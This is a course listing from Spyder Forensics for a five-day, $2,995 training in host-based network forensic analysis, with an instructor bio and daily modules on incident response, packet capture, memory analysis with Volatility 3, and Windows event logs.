Host Based Network Forensic Analysis
5 Days – 40Hrs
Cost: $2,995
Participants will receive
5-Days of Instruction
Course Manual
Practical Files
Attendance Certificate
Anna Truss
Lead Developer
Anna Truss is a highly skilled and respected professional in the field of digital forensics. With extensive experience as a forensic practitioner and trainer, Anna has made significant contributions to the examination and analysis of digital data.
She also teaches cyber security, web development and scripting courses at several colleges in the USA and serves as a senior course developer and trainer for Spyder Forensics. Anna Truss’s commitment to her field, her unwavering attention to detail, and her passion for training others make her a prominent figure in the realm of digital forensics. Her contributions continue to have a significant impact on the field, enhancing the capabilities of investigators and ensuring justice in the digital age.
Course Objectives
The Advanced Host Based Network Forensics course offered by Spyder Forensics is an intensive week-long training program designed for experienced examiners in digital forensics. Geared towards individuals familiar with digital forensic principles, this course aims to expand their expertise in advanced network exploitation forensics using a range of third-party tools on a host system that is the victim of an attack.
Throughout the training, participants will gain unbiased knowledge and essential skills for analyzing artifacts resulting from network intrusion activities. The curriculum involves the use of standard tools and open-source applications to delve deeper into data exploration. By understanding how applications function and store data during network intrusions, attendees will acquire the expertise needed to navigate forensic challenges.
The course covers the identification, processing, understanding, and documentation of crucial forensic artifacts related to network intrusion investigations. Participants will learn to use various applications and utilities effectively. This includes capturing and analyzing network traffic, triaging live systems, and examining memory captures to pinpoint potential malware and threat artifacts. The curriculum also encompasses the analysis of Windows artifacts to uncover additional information relevant to network intrusion investigations.
Emphasizing hands-on learning, students will utilize a variety of open-source and leading forensic applications in extensive labs and exercises. By the end of the course, attendees will have acquired comprehensive skills and knowledge to conduct advanced network forensic analyses.
Primary Learning Objectives
Host Based Network Forensic Analysis - Day 1
Day 1 of the Spyder Forensics Host-Based Network Forensic Analysis course begins with an overview of the course along with an introduction to the Instructor.
The day then continues as we learn about key network concepts and why this understanding is an essesntial weapon in the investigators armoury.
This course module is centered around key network concepts, their significance, and the reasons why understanding these concepts is crucial for investigators.
It aims to impart knowledge about various requirements and concepts that affect the search and seizure of network traces.
The module employs a variety of teaching methods, including informal lectures, structured discussions, and assessed practical exercises, offering students ample chances for interaction with each other and the instructor.
- Course Outline
- Network Equipment
- VPN and Proxy Server
- Network Diagrams
- Network Logs
- Securing Network
- Firewall
- Enterprise Level Network Topology
- Enterprise Data
Instructor Led lab
In this lab, participants will learn essential skills for network security, starting with how to use a network scanner to identify devices and vulnerabilities. The session will cover the use of a VPN client and application to ensure secure connections, as well as techniques for locating router logs and creating firewall logs for traffic monitoring. Additionally, attendees will gain hands-on experience using Snort on a Windows system, including how to interpret Snort log files for effective threat analysis and incident response.
Host Based Network Forensic Analysis - Day 2
Day 2 of the course looks at the fundamentals of incudent response and the creation of a response team who will respond to an incident.
During the day you will be presented with a case study and pratical exercise so that you can gain an uderstanding or a system compromise.
Instructor Led Lab
There is no Instructor Led Lab associated with this module
This module is designed to cover the fundamentals of incident response. It begins by discussing the creation of an incident response team and outlines the typical steps involved in responding to an incident. The aim of this module is to explore various factors and concepts that are crucial for the effective handling of an incident response.
Moreover, it presents a case study of a system intrusion and incorporates a practical exercise to illustrate system compromise. The module employs a blend of teaching methods, including informal lectures, guided discussions, and hands-on exercises, enabling students to engage actively both with their peers and the instructor.
- Planning Incident Response
- Conducting a Response
- Attacker Methodologies
Host Based Network Forensic Analysis - Day 3
We continue the course by looking at internet traffic and how and why data packets are scrutinized along with the crucial role that monitoring plays in detecting intrusions as well as understnding the methods used by adversaries.
Instructor Led Lab
In this lab, participants will be introduced to Wireshark, a powerful tool for network analysis. The session will cover the basics of capturing packets on a system, as well as techniques for adding columns and filtering packets to streamline analysis. Attendees will learn how to effectively examine packet captures, including methods to filter and search for large data transfers within the data stream. Additionally, the lab will focus on detecting and examining Command and Control (C2) traffic, providing insights into identifying potential security threats in network communications.
This module is centered on the acquisition and examination of internet traffic. Numerous organizations deploy content monitoring and management systems to ensure the security and efficiency of their internal networks. A common practice among these organizations is to scrutinize data packets as they traverse the network.
While this monitoring primarily serves to assess network health and identify networking problems, it can also play a crucial role in detecting intrusions, determining the extent of these intrusions, and understanding the methods used by adversaries.
In this module, we will cover the fundamentals of capturing data packets and how to analyze these packets to identify signs of malicious activities.
- Introduction to Network Packets and NetFlow
- Network Capture Methodology
- Examining Packet Captures
- Data Exfiltration
- Understanding Command and Control Traffic
Host Based Network Forensic Analysis - Day 4
Day 4 of the course deals with an analysis of Volatile Memory as well as on-scene traiage of active devices. The participant will learn various useful techniches such as how to collect RAM using multiple tools and the analysis of system memory and the uncovering of artifacts not yet commited to permanent storage.
This module is dedicated to the collection and analysis of volatile memory, as well as the on-scene triage of active devices. Analyzing a system’s memory is a vital step in identifying currently running processes, uncovering artifacts that have not yet been committed to permanent storage, and potentially detecting active malware within a network domain.
To facilitate a comprehensive learning experience, the module employs a variety of instructional strategies. These include informal lectures that provide foundational knowledge, guided discussions that encourage in-depth exploration of topics, and graded practical exercises that offer hands-on experience. Through these diverse teaching methods, students are given numerous opportunities to engage both with each other and with the instructor, enhancing their understanding and proficiency in volatile memory analysis.
- Triage and Memory Capture
- Memory Capture in Incident Response
- Memory Theory for Forensics and IR
- Memory Carving
- Utilizing Memory in Malware Analysis
- Volatility 3 and Analysis
Instructor Led Lab
In this lab, participants will learn how to effectively collect RAM using multiple forensic tools, setting the foundation for memory analysis. The session will introduce basic commands to analyze running processes within Volatility 3, emphasizing the use of strings, grep, and various options for enhanced analysis. Participants will explore techniques using bulk extractor, stop lists, and methods to locate critical data. Additionally, the lab will cover the use of pslist, pstree, and psscan commands, along with relevant Windows plugins for Volatility 3, equipping attendees with essential skills for memory forensics.
Host Based Network Forensic Analysis - Day 5
Day 5, the concluding day of the course will involve us taking a look and Windows Event looks and how to analyze them. We will also look ay Timeline Analysis and what role this plays in a digital forensic examination.
We will also look at Windows Processes and how to identify legitimate and suspicious ones.
Instructor Led Lab
In this lab, participants will learn how to analyze Windows event logs to uncover critical information about system activities. The session will cover the use of KAPE and other tools to efficiently analyze event timelines, enabling a quick assessment of system events. Attendees will learn techniques for searching evidence of malware persistence and gain skills in identifying both legitimate and suspicious processes, enhancing their ability to conduct thorough investigations and respond to potential security threats effectively.
Investigating network attacks involves numerous challenges, particularly because these attacks often span across multiple systems. Windows systems are likely to retain significant information post-attack. It’s crucial to identify and analyze this residual data to piece together the event sequence and pinpoint any nefarious activities within the network.
This process requires a clear understanding of the types of information that can be extracted and the specific locations to examine.
The module at hand is designed to equip investigators with a variety of techniques to efficiently process and understand the available data. Moreover, practical exercises are included to train agents in uncovering information pertinent to their investigations.
This module uses several instructional strategies – informal lecture, guided discussion and graded practical exercise – to provide students with multiple opportunities to interact among themselves and with the instructor.
- Windows Event Logs
- Timeline Analysis
- Malware Persistence Locations
- Windows Processes
- Windows Subsystem for Linux artifacts